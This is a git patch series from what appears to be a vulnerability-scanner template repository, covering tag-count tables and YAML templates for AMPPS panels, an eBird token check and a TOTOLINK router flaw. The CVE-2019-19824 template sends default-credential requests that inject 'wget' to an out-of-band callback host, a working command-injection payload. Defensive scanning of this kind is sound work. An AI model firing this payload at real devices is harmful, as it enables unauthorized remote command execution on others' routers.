+| zcms | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | | nweb2fax | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| facebook | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | | etherscan | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | | daybyday | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| mailgun | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| seeddms | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| bible | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| umbraco | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| dnn | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| wp | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| ecshop | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 89b4f69f41..bf4784b2c7 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | -| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | -| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | -| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | -| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | -| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | -| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | +| cve | 869 | dhiyaneshdk | 320 | cves | 874 | info | 860 | http | 2379 | +| lfi | 357 | daffainfo | 313 | vulnerabilities | 337 | high | 672 | file | 57 | +| panel | 303 | pikpikcu | 281 | exposed-panels | 299 | medium | 499 | network | 47 | +| xss | 270 | pdteam | 211 | technologies | 216 | critical | 310 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 200 | low | 159 | | | +| exposure | 254 | dwisiswant0 | 152 | misconfiguration | 152 | | | | | +| rce | 225 | gy741 | 86 | token-spray | 108 | | | | | +| tech | 212 | pussycat0x | 83 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 68 | default-logins | 62 | | | | | +| cve2021 | 170 | 0x_akoko | 66 | file | 57 | | | | | From 984c293b0dc277c441cd006ded25ff66af701602 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 13 Nov 2021 20:02:44 +0000 Subject: [PATCH 3592/4083] Auto README Update [Sat Nov 13 20:02:44 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 14ebbd7e62..07343b4ebb 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | -| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | -| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | -| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | -| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | -| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | -| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | +| cve | 869 | dhiyaneshdk | 320 | cves | 874 | info | 860 | http | 2379 | +| lfi | 357 | daffainfo | 313 | vulnerabilities | 337 | high | 672 | file | 57 | +| panel | 303 | pikpikcu | 281 | exposed-panels | 299 | medium | 499 | network | 47 | +| xss | 270 | pdteam | 211 | technologies | 216 | critical | 310 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 200 | low | 159 | | | +| exposure | 254 | dwisiswant0 | 152 | misconfiguration | 152 | | | | | +| rce | 225 | gy741 | 86 | token-spray | 108 | | | | | +| tech | 212 | pussycat0x | 83 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 68 | default-logins | 62 | | | | | +| cve2021 | 170 | 0x_akoko | 66 | file | 57 | | | | | -**182 directories, 2531 files**. +**184 directories, 2564 files**. </td> </tr> From 451366d33efb6b7b7eed6ba8b77ce5975a6a73e1 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim <gy741.kim@gmail.com> Date: Sun, 14 Nov 2021 13:17:27 +0900 Subject: [PATCH 3593/4083] Create CVE-2019-19824.yaml On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> --- cves/2019/CVE-2019-19824.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2019/CVE-2019-19824.yaml diff --git a/cves/2019/CVE-2019-19824.yaml b/cves/2019/CVE-2019-19824.yaml new file mode 100644 index 0000000000..d319ead138 --- /dev/null +++ b/cves/2019/CVE-2019-19824.yaml @@ -0,0 +1,41 @@ +id: CVE-2019-19824 + +info: + name: TOTOLINK - Remote Code Execution + author: gy741 + severity: high + description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 + - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html + tags: cve,cve2019,totolink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-19824 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /boafrm/formSysCmd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46cGFzc3dvcmQ= + Accept: */* + Content-Type: application/x-www-form-urlencoded + + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}} + + POST /boafrm/formSysCmd HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + Accept: */* + Content-Type: application/x-www-form-urlencoded + + submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From f046a1057686a495193dbc22b624dc1db7c35a88 Mon Sep 17 00:00:00 2001 From: "Kamran Saifullah (Frog Man)" <16836050+deFr0ggy@users.noreply.github.com> Date: Sun, 14 Nov 2021 14:33:51 +0500 Subject: [PATCH 3594/4083] AMPPS - Directory Listing Misconfiguration --- misconfiguration/ampps-dirlisting.yaml | 29 ++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/ampps-dirlisting.yaml diff --git a/misconfiguration/ampps-dirlisting.yaml b/misconfiguration/ampps-dirlisting.yaml new file mode 100644 index 0000000000..b8860ca458 --- /dev/null +++ b/misconfiguration/ampps-dirlisting.yaml @@ -0,0 +1,29 @@ +id: ampps-dirlistings + +info: + name: AMPPS by Softaculous - Directory Listing Enabled + author: Kamran Saifullah - Frog Man, @github.com/deFr0ggy + severity: info + tags: panel, ampps, softaculous, directory + +requests: + - method: GET + path: + - "{{BaseURL}}/client/" + - "{{BaseURL}}/files/" + - "{{BaseURL}}/icons/" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "<title>[AMPPS] - Web Local" + - "Powered by AMPPS" + part: body + condition: or + + - type: status + status: + - 200 \ No newline at end of file From cf3f373db81cf2bdf9f527357d93e35a4a36ad90 Mon Sep 17 00:00:00 2001 From: "Kamran Saifullah (Frog Man)" <16836050+deFr0ggy@users.noreply.github.com> Date: Sun, 14 Nov 2021 14:53:02 +0500 Subject: [PATCH 3595/4083] AMPPS - Exposed Login Panel --- exposed-panels/ampps-panel.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/ampps-panel.yaml diff --git a/exposed-panels/ampps-panel.yaml b/exposed-panels/ampps-panel.yaml new file mode 100644 index 0000000000..cd3a252254 --- /dev/null +++ b/exposed-panels/ampps-panel.yaml @@ -0,0 +1,33 @@ + +id: ampps-panel + +info: + name: AMPPS Login Panel + author: Kamran Saifullah - Frog Man, @github.com/deFr0ggy + severity: info + tags: panel, ampps + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps/" + - "{{BaseURL}}/ampps/index.php" + - "{{BaseURL}}/ampps/index.php?act=login" + - "{{BaseURL}}/ampps/index.php?act=login&sa=fpass" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - '' + - '' + - 'Login' + - '' + part: body + condition: or + + - type: status + status: + - 200 \ No newline at end of file From 76f21c7a19c8780e1c3e9f612f3c8cb33bfba66e Mon Sep 17 00:00:00 2001 From: "Kamran Saifullah (Frog Man)" <16836050+deFr0ggy@users.noreply.github.com> Date: Sun, 14 Nov 2021 15:02:37 +0500 Subject: [PATCH 3596/4083] Update ampps-panel.yaml --- exposed-panels/ampps-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/ampps-panel.yaml b/exposed-panels/ampps-panel.yaml index cd3a252254..f36a9c798a 100644 --- a/exposed-panels/ampps-panel.yaml +++ b/exposed-panels/ampps-panel.yaml @@ -1,4 +1,3 @@ - id: ampps-panel info: @@ -30,4 +29,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 914104b3f358e66e3c60589742cd3fc82955dbd4 Mon Sep 17 00:00:00 2001 From: "Kamran Saifullah (Frog Man)" <16836050+deFr0ggy@users.noreply.github.com> Date: Sun, 14 Nov 2021 15:14:04 +0500 Subject: [PATCH 3597/4083] AMPPS - Exposed Admin Panel --- exposed-panels/ampps-admin-panel.yaml | 32 +++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposed-panels/ampps-admin-panel.yaml diff --git a/exposed-panels/ampps-admin-panel.yaml b/exposed-panels/ampps-admin-panel.yaml new file mode 100644 index 0000000000..d54eee3c77 --- /dev/null +++ b/exposed-panels/ampps-admin-panel.yaml @@ -0,0 +1,32 @@ +id: ampps-admin-panel + +info: + name: AMPPS Admin Login Panel + author: Kamran Saifullah - Frog Man, @github.com/deFr0ggy + severity: info + tags: panel, ampps + +requests: + - method: GET + path: + - "{{BaseURL}/ampps-admin/" + - "{{BaseURL}}/ampps-admin/index.php" + - "{{BaseURL}}/ampps-admin/index.php?act=login" + - "{{BaseURL}}/ampps-admin/index.php?act=login&sa=fpass" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - '' + - '' + - 'Login' + - '' + part: body + condition: or + + - type: status + status: + - 200 \ No newline at end of file From 60a36cb4012bb6585ff5c2c2233f2ac1f0f45f9c Mon Sep 17 00:00:00 2001 From: ImNightmaree <22177675+ImNightmaree@users.noreply.github.com> Date: Sun, 14 Nov 2021 22:05:11 +0000 Subject: [PATCH 3598/4083] Delete freshdesk-takeover.yaml --- takeovers/freshdesk-takeover.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 takeovers/freshdesk-takeover.yaml diff --git a/takeovers/freshdesk-takeover.yaml b/takeovers/freshdesk-takeover.yaml deleted file mode 100644 index d3650572d8..0000000000 --- a/takeovers/freshdesk-takeover.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: freshdesk-takeover - -info: - name: freshdesk takeover detection - author: naglinagli - severity: high - tags: takeover - reference: https://twitter.com/ja1sharma/status/1377239265348743175 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'There is no helpdesk here!' - - 'May be this is still fresh!' - - 'freshdesk.com/signup' - condition: and - - - type: dsl - dsl: - - '!contains(host,"freshpo.com")' \ No newline at end of file From 2d7072d5d1ff90cc8e1d52965daed9e3260cd46b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 15 Nov 2021 07:24:14 +0700 Subject: [PATCH 3599/4083] Create api-ebird.yaml --- token-spray/api-ebird.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 token-spray/api-ebird.yaml diff --git a/token-spray/api-ebird.yaml b/token-spray/api-ebird.yaml new file mode 100644 index 0000000000..bcbcfdcb36 --- /dev/null +++ b/token-spray/api-ebird.yaml @@ -0,0 +1,28 @@ +id: api-ebird + +info: + name: eBird API Test + author: daffainfo + severity: info + reference: + - https://documenter.getpostman.com/view/664302/S1ENwy59 + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/eBird.md + tags: token-spray,ebird + +self-contained: true +requests: + - method: GET + path: + - "https://api.ebird.org/v2/data/obs/KZ/recent" + headers: + X-eBirdApiToken: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"speciesCode":' + - '"comName":' + - '"sciName":' + - '"locId":' + condition: and From 7566a563cd788a69ba83bd650d518685b2ea6537 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 15 Nov 2021 17:11:47 +0530 Subject: [PATCH 3600/4083] Update CVE-2019-19824.yaml --- cves/2019/CVE-2019-19824.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2019/CVE-2019-19824.yaml b/cves/2019/CVE-2019-19824.yaml index d319ead138..f15395c196 100644 --- a/cves/2019/CVE-2019-19824.yaml +++ b/cves/2019/CVE-2019-19824.yaml @@ -6,14 +6,15 @@ info: severity: high description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - tags: cve,cve2019,totolink,rce + - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 + - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 + tags: cve,cve2019,totolink,rce,router requests: - raw: @@ -24,7 +25,7 @@ requests: Accept: */* 